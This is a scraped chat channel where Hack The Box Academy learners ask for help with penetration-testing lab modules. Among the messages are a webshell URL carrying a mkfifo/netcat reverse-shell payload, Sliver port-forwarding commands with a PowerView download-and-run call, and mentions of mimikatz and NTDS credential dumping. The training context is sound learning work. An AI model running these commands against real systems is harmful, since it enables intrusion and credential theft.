#modules

1 messages · Page 436 of 1

strong sorrel
#

i tried

cd target-NFS
ls

no files or directories :(
what do i do ?
brave scroll
#
  • you cannot export a single file you have to mount an NFS folder
strong sorrel
#
i even did 

showmount -e localhost

output comes like
Export list for localhost:
/tar/tar.txt 172.16.61.0/24

what am i doing wrong

brave scroll
#

how you are mounting the folder, share the command only.

strong sorrel
#

but still no positive op

#

mkdir target-NFS
sudo mount -t nfs 172.16.61.128:/tar ./target-NFS -o nolock

this is the command i used for mounting

brave scroll
#

on which machine you are @strong sorrel

strong sorrel
#

kali

brave scroll
#

means module

strong sorrel
#

footprinting/NFS

brave scroll
#

link of module.

strong sorrel
#

i was able to easily complete the exercise, but in the module they mentioned to try out how NFS permissions and mounting works, to get a hold i tried to do it on myself, but i am not able to mount the file 😦

#

@brave scroll if your able to mount the file perfectly please do send me the complete right procedure for it, i have aldready wasted 3 days for this :(( i feel so frustrated knowing for a fact that there might be a very tiny misstake an im not getting the right output just because of it, machines want everything PERFECT 😦

spiral sapphire
#

Question for non-english speakers. Did you make your notes in english or in your native tongue? I'm wondering which language should I use?

storm elk
#

I prefer English as all the terms and interfaces are English

#

Makes it a bit easier and less prone to errors

#

In my opinion

stone grotto
#

I am new I am doing tier 0 is sudo nmap -sV and nmap -p- -sV give the same information

storm elk
#

The difference is the -p- scans all ports

#

While without it scans the 1000 most common ports

stone grotto
covert wagon
#

Hello

cloud urchin
lofty stump
#

Hello, Can anybody help me with Direct Prompt Injection section in Prompt Injection Attack module?
I put the ssh command and it froze after giving the pw. I was able to then open 127.0.0.1:5000 web portal and go to the first assignment. but when I try to submit my injection query it completely freezes and never shows any response back and I can't even re-open the page.

rustic sage
#

Need help on command injection skills assessment

hollow widget
#

Hi

#

I’ve got a question regarding module 112 within the MySql section … weird question.

signal hound
#

Hi. Pass the hash module
"Access the target machine using any pth tool etc' "
I can't use NXC, i get authentication failure
But i can use evil-winrm. Why?

craggy edge
craggy edge
heady sapphire
#

Hello I am struggling in module Attacking Active Directory and NTDS.dit. I have created a wordlists and performed brute force attack with netexec and found credentials for cjoshnson but when I use the -M ntdsutil it doesn’t capture the ntds file

craggy edge
craggy edge
heady sapphire
#

Impart secret dump works if you have already capture the ntds file

#

The only two seats that exist in the course is with netexec and with evil-winrm but none of this works in my case

craggy edge
#

dm me the command line output

#

and which exact section you are right now, so I can check me notes

#

and impacket-secretsdump can retrieve hashes from ntds file

haughty fiber
#

password attacks credential manager stuck. dumped credman using mimi but cant find required password

craggy edge
heady sapphire
signal hound
#

One sec

#

Nevermind

haughty fiber
craggy edge
haughty fiber
#

oh

opal smelt
#

Did you ever manage to solve (1) ? I ran into the exact same issue. Built the AVD, ran it, searched for the build number under Settings, About. But the build number found there is just not accepted, irrespective of how I format it.

long igloo
#

forget it i solved it

opal smelt
#

Did you ever manage to solve (1) ? I ran into the exact same issue. Built the AVD, ran it, searched for the build number under Settings, About. But the build number found there is just not accepted, irrespective of how I format it.

brave scroll
rancid fjord
rancid fjord
strong sorrel
nova pivot
#

Hey there, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly thinkpad

strong sorrel
rancid fjord
signal hound
#

I believe it has something to do with the version

long igloo
#

after checking the Python version as the exercise says, and getting it, exercise doesn't accept it.

sterile solstice
unborn prism
#

Has anyone been able to complete the Malware Classification section of "Applications of AI in Infosec"? I'm following the instructions exactly, but am constantly getting "NameError: name 'load_datasets' is not defined". Feel like I have tried everything.

strong sorrel
frosty geyser
#

Slm

#

👋

#

I have problems

unkempt steppe
#

Hey guys , i need a teammate for an imaginary CTF challenge. Can anyone join with me ? Pls dm me

muted hawk
signal hound
strong sorrel
flint palm
#

Guys hello. Who has done Pivoting Tunelling and Port Forwarding in Skills Assessment what is the format answer for this question Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

devout lily
#

Hi

bitter fjord
devout lily
#

Can someone explain me why there is a "Done reading? Check out ..." message on the general chat that impedes me to write on?

vagrant bluff
#

hii good people i was doing Pass the certificate from password attack i solved the first one "What are the contents of flag.txt on jpinkman's desktop?" then the next question "What are the contents of flag.txt on Administrator's desktop?" idk what to do i looked through the files in and found mimikatz.exe in Documents folder but it wont execute please help me

forest fulcrum
#

If anyone has finished the SCCM attacks part in CAPE, please DM me, thanks.

acoustic owl
gray yacht
gray yacht
gray yacht
wooden seal
vagrant bluff
gray yacht
gray yacht
wooden seal
gray yacht
vagrant bluff
gray yacht
faint hamlet
#

Active Directory Enumeration & Attacks module ACL Enumeration Section
is it normal to wait more than 10 minutes for powerview to enumerate ACLs?

gray yacht
#

Is the ccache actually located in the /tmp directory or is yours in the current working directory? Hey since your screenshot spoils content over Tier0 I'm going to delete it.

gray yacht
waxen totem
gray yacht
faint hamlet
waxen totem
faint hamlet
glacial juniper
#

what does this mean? don't really understand

waxen totem
bright coral
bitter fjord
acoustic owl
steady torrent
steady torrent
#

I have reset the box multipe times

bright coral
#

yes, just make sure that the correct TLD is used. The example uses .com

steady torrent
#

But the question uses .htb

bright coral
abstract plank
#

Hi, I'm stuck on Question 4 of the “Using crackmapexec” module.
The hint says, “Sysadmins save their credentials securely,” but I've searched everywhere and can't find anything.
I found a keepass file, but I don't think it's related. Is that correct?

acoustic owl
#

Without looking at my notes now. If the hint says that administrators keep their passwords safe and you find a password safe, then there should be a connection.

nova pivot
#

Doubling back just in case someone else has an idea, I just finished the Introduction to SQLi module, but I feel like I'm not going far enough in the final SA 🤔 As per the course content, we get a webshell, but I'm unable to upgrade from the webshell to a reverse shell, even though it seems quite easy...
For a reason I am yet to identify, the following request does not come back to my nc listener, would someone know why ?
http://SERVER:PORT/path/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $MY_IP 10000. Same goes for curl, but the same "path" with an id command works flawlessly thinkpad I also tried different payloads & URL encoding it

dusty ledge
nova pivot
abstract plank
nova pivot
abstract plank
acoustic owl
dusty ledge
nova pivot
cloud urchin
nova pivot
#

But my webshell passes through because it's running through the same port ?

cloud urchin
#

NM I see, the SQL injection fundamentals module. Yeah I don't think you're meant to get a revshell, there may be rules in place preventing it. You can just use the webshell as shown in the section. It doesn't show setting up a revshell.

#

You'd need to setup port forwarding on your local network to point it to your machine, and if you're using a VM depending on how you set it up you'd need to route traffic to your VM's subnet

#

not required for the section though

nova pivot
nova pivot
cloud urchin
nova pivot
#

Many thanks for the explanation

nova pivot
meager shadow
#

Let me redo that @cloud urchin

cloud urchin
#

@meager shadow please take care not to reveal attack paths for skill assessments

meager shadow
#

gotchu

#

Is there anyone who could help with the Server Side attack skills assessment - Edit: Disregard got it 🙂

cloud urchin
#

@polar sentinel No. Read the #rules.

craggy edge
#

lmaoo

cloud urchin
#

lmao. there's a whole platform dedicated to learning.

craggy edge
#

edit: this deleted comment was nuts

strange pivot
#

Anyone done the advanced deserialization: XML part? unsure as to why I'm getting this error:

+        $exception    {System.InvalidCastException: Unable to cast object of type 'System.Data.Services.Internal.ExpandedWrapper`2[System.Windows.Markup.XamlReader,System.Windows.Data.ObjectDataProvider]' to type 'TeeTrove.Models.Tee'.
   at TeeTrove.Controllers.TeesController.Import() in C:\Users\bill\Desktop\Advanced-Deserialization-Attacks\TeeTrove\Controllers\TeesController.cs:line 91}    System.InvalidCastException

The payload works in console app and all I've done is remove escapes and add the Tee tag.

#

The course is telling me that this is how its done, but its resulting in an error?

polar raven
finite abyss
#

In Advanced XSS and CSRF EXPLOITATION module, CSRF section it is given that Samesite cookies won't be sent in cross origin requests but it is wrong it should be cross site instead. Big difference

Do you think this is correct?

tall saffron
#

it is me or the lab TE.CL is illogic as fuck? i just resolved it and it seems a simulated http request smuggling because you let the update CL or put any CL it will resolve the lab (if you do the right thing to have CL taken)

pallid geyser
#

Hi guys, i hva some questions about XEE on file uploads attacks. When i upload a svg file. How the web server execute that file?? If my svg file execute file:///flag.txt

How the server execute that?

THX

Btw, i asked chat gpt but i cn barely understand it

fathom pendant
gusty crescent
#

.

#

Hi

cloud urchin
lucid grail
#

Hello , I am stuck on Window Credentials . Could someone help me to figure it out ?

lucid grail
#

My probelem is What password does Bob use to connect to the Switches via SSH ( Case-Sensititive). I tried to pivoting but not successful for ssh

rancid fjord
lucid grail
#

you used window rdp machine sudo su . not clear

#

C:/users/bob has .ssh file

#

but no access . I tried powershell but failed to read the content

devout lily
mellow rapids
#

Hi everyone!! Can someone help me with a quick help on the module File Upload Attack, beens stuck in one questions for two weeks now

#

Also re read the module again but still stuck

cloud sinew
#

For the Password Attacks module, I completed the newly added "Attacking Windows Credential Manager" section. I was able to do UAC bypass and use mimikatz.exe to get the plaintext password. However, I decided to do it again today just to solidify my understanding, and it gave me a different password for the user mcharles. And Now I'm confused lol

cloud sinew
mellow rapids
#

Applied everything learned on the Client side to bypass some upload filters. When I open the upload_images/shell.php4 it loads the page blank. Which means is not executing the file. When fuzzing the extensions I get q length of 225-230 responses which does not match the 193 on the exercises. I did not pay attention to this since the exercise get updated.

mellow rapids
cloud sinew
mellow rapids
#

I have strong grit which is why I keep looking at this every day, but still cannot pass it

cloud sinew
#

Wait I think I had a similar issue on one of the earlier modules, I would maybe swap vpn servers, and look into your shell code and make sure everything is absolutely perfect. I know sometimes the boxes can also be very unstable.

mellow rapids
#

I tried doing a reverse-shell but it did not work also did try to listen using netcat

cloud sinew
#

Is it the skills assessment?

severe crow
#

hello

#

i cant text in the general section why is that?

mellow rapids
#

Is the Blacklisted section

mellow rapids
severe crow
#

why?

mellow rapids
severe crow
#

anyways can someone give me some tips on how to get better at cyber security bcs when i practice on hack the box, i cant understand anything i start asking chatgpt and watch yt videos

severe crow
#

and i feel like im not learning anything

cloud sinew
# mellow rapids Is the Blacklisted section

I notice this section right here "Now, we can try uploading a file using any of the allowed extensions from above, and some of them may allow us to execute PHP code. Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code." Do you think it could be the extension you're using?

cloud sinew
mellow rapids
cloud sinew
#

^This. Eventually you'll brute force your mind into grasping it no matter how slow or quick.

severe crow
mellow rapids
cloud sinew
severe crow
#

well im studying cyber security as an skill i always wanted to learn it

mellow rapids
severe crow
#

not for an project

#

if its that what u mean

cloud sinew
severe crow
mellow rapids
cloud sinew
severe crow
cloud sinew
severe crow
#

should i use linux ?

#

should i also use try to hack me ?

mellow rapids
# severe crow alright thank you

The reason I am saying this, that is what I did and I am not a software developer but understand the difference in syntax for different languages

mellow rapids
cloud sinew
# severe crow should i use linux ?

You can download Virtual Box and watch a video on how to download that and download Linux and how to set it up as a virtual machine and you can practice from there. I would just mess around with it and get comfortable with the commands. You'll also want to get comfortable with PowerShell which is on Windows. It's overwhelming, but once it clicks, you'll find it much easier to learn different command lines.

severe crow
#

thank you a lot guys!

cloud sinew
tawdry palm
#

can someone pleas link me that github list of default creds that is in the penterster path i cantseem to find it anywhere :/

severe crow
#

lol

#

thsnks again!!!

#

thanks*

mellow rapids
mellow rapids
tropic trout
#

A puerto rican hacker 💀

mellow rapids
#

Can only help the world one grain at a time 🔥

tropic trout
#

I'm trying to think how much trouble a non-spanish speaking person would have pronouncing "Coqui"

#

Would they say cawkui

novel matrix
#

Let's keep this channel on topic!

tropic trout
mellow rapids
mellow rapids
mellow rapids
# gray yacht Are you unable to bypass it?

Unfortunately not yet, tried reading the treads in the forum but I think the exercise got updated due to the different response length than the example and the forums. I even tried an Asp file and changing the Content-Types I’ve gotten creative but no bypass yet

gray yacht
mellow rapids
#

Sending shortly

cloud urchin
#

@wet arrow Please take care not to spoil content from modules above tier 0

minor star
#

wsup

#

why cant i chat in general lol

#

it keeps directing me to modules

waxen totem
minor star
#

aight thanks dude

#

its so hard to do in mobile bro

lucid grail
#

Can anyone solve this problem ? what password does Bob use to connect to the Switches via SSH(Format:Case-Sensitive)

#

I am stuck this question solved other problems

wet arrow
cloud urchin
#

If you feel the need to post a little more info you can ask to DM someone but please don't post the content

wet arrow
#

My apologies. Is there a chat where I can ask for this clarifications?

lucid grail
#

I did pivoting based on winscp ip . looks like it is pivoting ip and port is 22 . I used LaZagne.exe , mimikatz but did not get ssh password

#

Pivoting is also not working

hexed oyster
#

OK... I'm Officially stuck on how to even begin assessing the 'web application & api -> practical assessment'. I can't get it to respond with the scripts that I've got and it's not responding to any of the curl request that I've formed... Does anyone have any advice?

drifting torrent
#

is there a channe for htb lab? i cant find it

cloud urchin
#

You need to follow instructions in #welcome to gain access to most channels in the server

tall saffron
abstract plank
#

I've been stuck on Q4 of the Skill Assessment in the crammapexec module for days. I need some hints.

gray yacht
icy egret
#

hello world,

What are the contents of flag.txt on Administrator's desktop? PASSWORD ATTACK module, Pass the certificate, second question.

I was able to get jpinkmans account via evilwnrm and got my first flag. But how i can get the Administrator's flag?

Please help(

abstract plank
wooden seal
abstract plank
wooden seal
icy egret
#

never mind, thanks for not answering lol, i got it

#

it was easy

#

i am just dumb

brave scroll
icy egret
#

no money no honey i see

brave scroll
icy egret
#

i feel like it is better to do it on my own without hints, since it will make you find a way to solve it.But meanwhile it takes my time((

brave scroll
#

if it's taking time, there is nothing wrong to take hint instead of direct way.
you can ask for hint whenever u think you are stucked but after trying your best -> as it will develop your methodology.

wooden seal
brave scroll
abstract plank
#

I was able to complete all the crackmapexec challenges. This may be the first time it took me this long. Thank you.

wooden seal
abstract plank
wooden seal
north frigate
#

Cheers! 🙂 Regarding the footprinting-module and the section about "IMAP / POP3" --> I needed to add the command tags in front of any command once logged in. I'm nont sure whether its in the academy-text or not, but I could not find it. I was kind of confused when the commands from the given command list did not work 😄 Is there another way or is it meant to be a bit confusing? 🙂

waxen totem
#

Need a sanity check on WindowsPrivilegeEscalation SA 1 - All my carbs are being spat out and I'm out of toner

craggy edge
craggy edge
#

you can DM if you want, I still have my notes about the skill assessment 1

craggy edge
shy pike
#

Hello please help about this question: What is the Type of the service of the "dconf.service"? and when i try this command: "sudo vim /etc/systemd/system/dconf.service" i get nothing

craggy edge
shy pike
#

From Linux Fundamentals> Task Scheduling

craggy edge
shy pike
#

yea I didn't

craggy edge
shy pike
#

okay copy that

lucid grail
#

@cloud urchin Could you please give me permission to DM you ?

sinful ledge
#

Hi

waxen totem
#

That's illegal, contact instagram support

sinful ledge
#

Someone did hack mine thats why was asking

#

👍

waxen totem
lucid grail
#

@waxen totem Could you please send me link how to enroll instagram support

lucid grail
#

@waxen totem Thanks

long igloo
#

I'm having an issue with the LSA secrets exercise

#

After dumping them locally, I got the ||dpapi machinekey and userkey with the secretsdump|| but I don't know how to retrieve creds from that, || hashid -m "machinekeyhash" or hashid -m "userkeyhash" || returns nothing

long igloo
# waxen totem `dpapi.py`

but that's not installed on the machine, neither python, can I install it? or for cleanliness I should find a way to do it without installing?

#

Because I tried the dumping externally and that didn't work

waxen totem
#

you use it on your attacker machine

jade lotus
#

Hello!! im having some problems crawling with finalrecon , i have no connection

waxen totem
jade lotus
#

yes

waxen totem
#

are you using this format:

<IP>(NO PORT) host subdomain
jade lotus
#

yes

waxen totem
#

DM me

long igloo
#

@waxen totem can I DM you too? I'm still lost as this is not explained on the module properly

eager siren
#

Can anyone provide some help for the LLM output attack skill assesment is been 3 days am still stuck on it

rustic sage
#

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

Can someone help me out? I checked for what extensions can be uploaded, changed the contents and tried to execute the file and i never got my flag just the output of what's inside the file

waxen totem
rustic sage
#

I cant sit and test all 45 manually that's way too much, I don't know why fuzzing isn't working as it's supposed to be

waxen totem
rustic sage
#

burpsuite

#

their built in fuzzer

waxen totem
#

Burp intruder is inherently slow, have you tried FFUF with a request.txt file or OWASP ZAPproxy ?

rustic sage
rustic sage
#

but burpsuite should work just fine for fuzzing extensions for file upload

waxen totem
waxen totem
rustic sage
#

i'll try it

rustic sage
ornate latch
#

Hi all, i was wondering if I can ask a question about the dynamic port forwarding with ssh and socks tunneling module here? I would like to post an image and get some clarification

acoustic owl
#

To be able to post pictures, you must verify your account
Read and follow #welcome

ornate latch
#

thank you friend, I just did that

#

am I okay to ask the question and post the image here now?

wooden seal
ornate latch
#

perfect, I has a question relating to this image. There is accompanying text: " Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly." I had questions regarding the NAT aspect of this statement. What does it mean in this context?

  • does it mean that the IP that I see in the image 172.16.5.129 is a translated IP itself?
  • or does it mean that ip 172.16.5.129 is the "public" ip of the NAT network and is performing translations for all machines behind it?
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling

wooden seal
#

our public is diff and private ip is diff coz of NAT

ornate latch
#

Yes I understand that, but I don't understand how that applies in this context. How does my tunneling and enumeration approach change given that 172.16.x.x is within a NAT'd network?

#

Since the victim server is already compromised, and that server has an interface to the 172.16.x.x. address, can't I access all machines in that network as usual?

dim sky
#

Hi everyone

wooden seal
#

you can access compromised machines directly (in same network) to access 172.16.x.x machines you have to do pivot to access that network

wooden seal
ornate latch
sacred ermine
#

anyone can help on the windows lateral movement skills assessment? just need a little nudge, stuck on the VNC part

wooden seal
ornate latch
#

The module text says this about that image:
Let's take an example of the below image where we have a NAT'd network of 172.16.5.0/23, which we cannot access directly.
Are you saying that the fact that 172.16.5.x is a NAT'd network is irrelevant?

wooden seal
ornate latch
#

yeah that's what i was wondering, that IP that is shown to me in the image 172.16.5.129 - is that a translated IP that this host has been given, or is the text saying that there is a private network, and 172.16.5.129 is the gateway ip into that network?

wooden seal
ornate latch
#

perfect, thank you so much 🙂

wooden seal
#

no problem, even i spent two weeks on pivoting (concept only) got way too confused 😂

silver abyss
#

Hey, could anyone give me some hint with the password attacks module assessment? I got to DMZ01, I had scan rest of the hosts with nmap, tried to brute force SMB on FILE but can't make it work, not sure if it is possible.

sacred ermine
#

or do I have to run it on WSUS host? but there is no such user as rossy there, but I guess I can create in rossy context the new process, oh my dayz, its disgusting

gray yacht
sacred ermine
fathom sundial
#

Hello did you find a solution?

gray yacht
fathom sundial
#

Hello did you find a solution. Im also stuck in this question. I tried it a few times but i cant find my mistake.

sacred ermine
fathom sundial
#

Did you find a solution? Im also stuckt at this Point...

sacred ermine
#

But I cannot solve yet how can I run it, I am having trouble to get the process running as rossy

fathom sundial
#

Hi, im Stuckt in the Androit Fundamentals Module.
I Followd the instruction but my Answer ist wrong.
Do you have any Ideas?

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I Solved it...

silver abyss
lucid grail
#

Did anyone solve window credentials module in Password attack . I have been stuck for two week

gray yacht
lucid grail
#

Did you solve "What Bob uses password to switch via SSH ?" I did pivotiing , mimikatz but nothing is worked

gray yacht
lucid grail
#

@wooden seal Did you solve SSH...

wooden seal
lucid grail
#

@wooden seal Please DM me

wooden seal
#

@lucid grailcan you name the sub module?

lucid grail
#

Credential Hunting in Windows

#

@wooden seal Credential Hunting in Windows

verbal turtle
#

why thats problem ?

wooden seal
wooden seal
verbal turtle
cloud shoal
#

Hi, I am a complete beginner in cybersecurity and just started doing my first path of cracking into HTB, and in the module of Getting Started, I am stuck on the exercise in public exploits which is: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start). So i ran msfconsole, and search exploit eternalblue and ran the exploit but it didn't work. I am confused on how to approach this.

gloomy stump
#

Hi I have a question on Modul "Pivoting, Tunneling, and Port Forwarding" "Port Forwarding with Windows Netsh", I set the portforwarding with netsh, with Remmina it works but xfreerdp fails, can I only use xfreerdp with one window?

fathom pendant
#

Xfreerdp works with multiple windows

gloomy stump
#

Ok why doesn't it work? Remmina works... isn't it the same connection?

fathom pendant
#

no idea why its not working, im assuming you did the proxychains/whatever ¯_(ツ)_/¯

gloomy stump
#

Can I dm you? I don't want to spoiler commands

fathom pendant
#

Sorry dms arent open atm

gloomy stump
#

Ok can I show you the commands here?

#

Do I need to configure proxychains if i use portproxy?

#

I will try to reboot the machines 🙂

lucid grail
#

@wooden seal Did you find any solutions for Window Credentials in Password Attack module ?

#

@wooden seal I have been stuck for almost three week

wooden seal
#

i told u a hint

#

it should help u @lucid grail

lucid grail
#

@wooden seal Please give me hint . That is also helpful

#

@wooden seal you are talking about cheatsheet

wooden seal
haughty fiber
#

Password Attacks module credential hunting in network shares. I'm stuck cant find creds of other user, too much data

fathom pendant
#

Maybe using a pattern is useful

flint palm
#

guys hello I can't run ptunnel-ng tried all means to install it but nothing worked even chmod

cloud shoal
#

When I did nmap I found a port to login page

#

But in the source code

#

There was no test login available

waxen totem
cloud shoal
#

Where's the vulnerability database?

fathom pendant
#

Google, searchsploit, msfconsole

echo roost
#

Intro to C2 Operations with Sliver In the Kerberos Delegation & Enumeration using rportfwd this doesn't work -
Assume that we set up a file server on port 8080 on our attack machine, and the target cannot reach this port. However, it can reach port 8080 on WEB01; we can create a reverse port forwarding on WEB01 to relay the traffic between SRV01 and our attack machine. To circumvent those types of restrictions, we will utilize the reverse port forwarding (rportfwd) functionality in Sliver. Execute the following command in the session of WEB01:
Kerberos Delegation & Enumeration

sliver (http-beacon) > rportfwd add -b 8080 -r 127.0.0.1:8080

[*] Reverse port forwarding 127.0.0.1:8080 <- :8080

This only loops traffic to local host from web01 to itself.

You need to add the following to make it work in that section:

On the Web01 session

sliver (http_beacon) > rportfwd add -b 8080 -r 10.10.14.189:8080

[*] Reverse port forwarding 10.10.14.x:8080 <- :8080

sliver (http_beacon) > rportfwd 

 ID   Remote Address      Bind Address 
==== =================== ==============
  3   10.10.14.x:8080   :8080        

Then on the srv1 pivot:

rportfwd add -b 8080 -r 127.0.0.1:8080

then on the srv01 pivot session

sharpsh -- '-u http://127.0.0.1:8080/PowerView.ps1 -e -c R2V0LU5ldENvbXB1dGVyIC1VbmNvbnN0cmFpbmVkCg=='
echo roost
#

thank you @fathom pendant

fathom pendant
#

Using patterns like "pass" or "passw"

haughty fiber
#

ok

#

also, any idea why nxc doesnt work but netexec works fine

waxen totem
fathom pendant
primal coral
#

hey guys, i really really need a nudge

#

anyone around?

#

hello?

cloud urchin
#

you didn't even say which module/section/question you're on

primal coral
#

sorry

#

I was just waiting for a reply...

bold mauve
#

@indigo roost I finally got time to test your suggestion for using RDP through SSH but unfortunately it did not work gave me the error:"Please check that the $DISPLAY environment variable is properly set."

primal coral
#

Credential Hunting in Network Shares - As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

#

been stuck on this for hours

#

chasing my tail

gray yacht
fathom pendant
olive peak
#

Anyone able to give a second opinion on what I may be doing wrong. I’m working with using chisel and trying to pivot to another machine using Xfreerdp basically my first target is a 10.129…… second target is a 172.16……. The 10. Has a network adapter that does Include a matching subnet to the 172. I did confirm my second target machine is listening on 3389 but I don’t seem to be able to get into the computer. I did confirm the windows 1st target is able to communicate with my attack client.

#

I’m wanting to believe that the user/pass I was able to recover does not have remote features, I need to confirm but I feel like the module I’m working on, the user is the only available one to get within.

rotund sequoia
#

Module: File Transfer Methods, Section SMB Downloads.

Why do I need to spin up an SMB server for downloading files from a share? Can't I just log into an SMB server via smbclient and just use the get/mget command and download the file?
Is it more evasive to mount a share and then copy it?

indigo roost
sonic crow
#

Hii yha koi hindi bolne vala hai kya

bold mauve
#

yeah unfortunately running as root and resetting has not fixed it maybe the connection is slow or the machines. I am currently RDP'd into Kali and then RDP'd into the windows machine but it takes several seconds for it to register input

indigo roost
zenith pagoda
#

Hello everyone

#

Need help here

#

So in the SIEM fundementals skill asseseemnt it says connect to http://[Target]:5601

#

when I spawn the target enter the ip it doesnot work

#

It says unable to connect

#

It was working on the previous section but when I reached skill assessment it is not working

indigo roost
zenith pagoda
#

Tried to wait for 20 minutes and I am facing this problem since yesterday

#

tried to change the target several time but nothing is working

inner pivot
#

can someone help me out, i'm doing the introduction to infosec course in HTB and i'm stuck in the public exploits section,|| i found out about the wordpress 5.6.1 and some themes||, nothing more than that, i also found a lot of possible public vulns, but i still can´t figure it out, what am i missing?
*sorry about the bad english

fathom pendant
inner pivot
#

i feel really dumb right now... but thanks a lot

west arrow
#

Any good resources to learn about DLL Injecting/Hijacking and DLL in general. Im on windows privesc module, DLL injection part but i'm not quite understanding it

gritty bay
#

Hi whenever i need to use metasploit to have an reverse shell i have this error Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi Did you mean? STDIN therefore i use the web vm anyone got this error ?

twilit gazelle
#

Which modules should I complete before attempting OUTBOUND ??

regal creek
#

.

#

.

flint hearth
#

hi guys im stuck on this question for skills assessment documentation and reporting Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.

gray yacht
flint hearth
#

both

gray yacht
flint hearth
#

for the module yes, im on the skills assessment but this is the first question of the skills assessment

gray yacht
#

I'd pick up with the easy stuff. If something was run already, might be worth running it again just to make sure you captured everything and something wasn't missed from the previous assessor.

flint hearth
gray yacht
flint hearth
#

don't think so

gray yacht
flint hearth
#

justt the module

gray yacht
# flint hearth justt the module

Well if you do not have any pentesting knowledge (professional or via HTB Academy or similar platform) or experience, you are likely not going to get through the skills assessment.

flint hearth
#

I have done the pen testing modules on HTB Academy and have tried commands on PowerShell, but have gotten nowhere for this question :(. any advice and guidance would be appreciated if anyone has done this module

west arrow
#

You may want to do the CPTS path in order, like it is supposed to be taken..

gray yacht
flint hearth
upper widget
#

Has anybody completed intro to academy's purple modules?

upper widget
sturdy sonnet
#

any moderator or past CTF player can tell, in coming smacksmash-HTB CTF , will there be digital certificates of participation ????

shadow beacon
#

Can anyone help me?

sturdy sonnet
shadow beacon
#

hi

#

Web Attacks
Bypassing Security Filters
I'm stuck on this
Should I send the request with get

shadow beacon
fathom pendant
#

Just be patient

shadow beacon
fathom pendant
#

Was your question: "should I send as a GET request?"
If so: did you try?

shadow beacon
compact patrolBOT
#

• Gateway Latency: 92ms
• Start time: 4 days ago
• Version: 1.4.4

fathom pendant
#

Actually nvm I just changed the request to get after

#

It didn't take much it just worked

shadow beacon
#

😢 worked, thanks

devout ginkgo
#

Is it possible to do things on my own terminal instead of web based terminal?

devout ginkgo
fathom pendant
#

connecting to academy vpn
😉

#

Yes its for academy

devout ginkgo
#

I do it on the terminal I have at the subject

#

Hahaha

fathom pendant
#

:D

devout ginkgo
#

Oh yeah an other question Im at the Linux fundamentels lesson but when I read about a subject and going to the question the question is way different of the things I have learned is that normal?

fathom pendant
#

It's not as different as you think

#

Most of the questions will relate to the reading in some way, or a previous section of the module

#

ZAP hud is iffy sometimes, I never really used/needed it

craggy edge
#

yes ZAP HUD was such a big pain in the ass for me. For the skill assessment of this module, you don't need to touch zap once if you want

grizzled schooner
#

Gonna do my best to ask this question without spoiling content from the module

Pivoting, Tunneling, and Port Forwarding | Remote/Reverse Port Forwarding with SSH

Within the contents of the module, there's an example of how to build a reverse_https payload for a reverse shell. Within that syntax there's reference to a "backupscript.exe" is this exe just an executable with reverse shell code in there? Just trying to understand for notes sake - please @ with replies

craggy edge
grizzled schooner
#

Sweet, I thought so, but I just wanted to make sure, thanks

west iris
#

MAKE IT MAKE SENSE!

craggy edge
#

rip @west iris

west iris
#

it is the spawn, i just poped out into the side to work side by side

#

ok i see. I am new to this and have had to take time off for an extended health crisis. lik i said "make it make sense" and you made it make sense 🤣

gilded radish
#

Yo where to download a cyber-skills-benchmark-2025

olive peak
#

Is anyone able to assist me with a question involving pivoting with the AD Enum skills assessment part 1.

fervent moss
#

I need someone to mentor me in hacking

cloud urchin
cloud urchin
gilded radish
cloud urchin
fathom pendant
#

Cyber benchmark was the last biz ctf

cloud urchin
#

ahh

gilded radish
#

What? On maun site it says download, Where I suppose to download it or buy or whatever

fathom pendant
#

Idk if they've uploaded the challenges to the platform yet

gilded radish
#

just tell me where is that, on main site it is just a description and thats all

fathom pendant
#

But we're veering off-topic still

#

You can search the writeups on the htb gh and find the challenge names off that

gilded radish
#

so in that book are only write ups?

fathom pendant
#

No

gilded radish
#

I thought it was about some reserches etc

fathom pendant
#

Look, this is getting off-topic, I suggest linking your account and at least asking in #general

astral vine
#

I'm going through and doing some module labs that I need to get done so I can sit the CPTS and there is a particularly frustrating module "Password Attacks" Section: Network Services, now I know how to do all of this already keep that in mind, just checking boxes here so I can sit the exam.
But did anybody else have issues with the last flag for SMB? I have reset this damn box like 4 times, for sure have the proper creds (of which there are only 4 keep that in mind)
and the person who is supposed to have access to said share just flat out doesn't
its super annoying
the share is even named after this person
so I go and look at the "solution" in the writeup, confirmed its indeed what I am doing 1:1 and its saying indeed that should work and they should have access... they do not have access no matter what I do.
You all ran into this?

fervent moss
cloud urchin
gray yacht
astral vine
#

<@&861185840277487616>

#

oh that was quick

astral vine
#

I feel dumb, it was on like my 5th reset where I was like dude wtf

#

I'm just tired :(

jolly oasis
#

I have a question on Cross-Site Scripting (XSS) > Phishing > XSS Discovery > "Before you continue, try to find an XSS payload that successfully executes JavaScript code on the page."

It's obvious which parameter I should be testing. I tried XSStrike but I don't understand how to use the payloads it generated. I tried entering them in the image URL box but it doesn't seem to do anything.

#

I tried the payload that we learned to try when script tags don't seem to be allowed.

tight marten
#

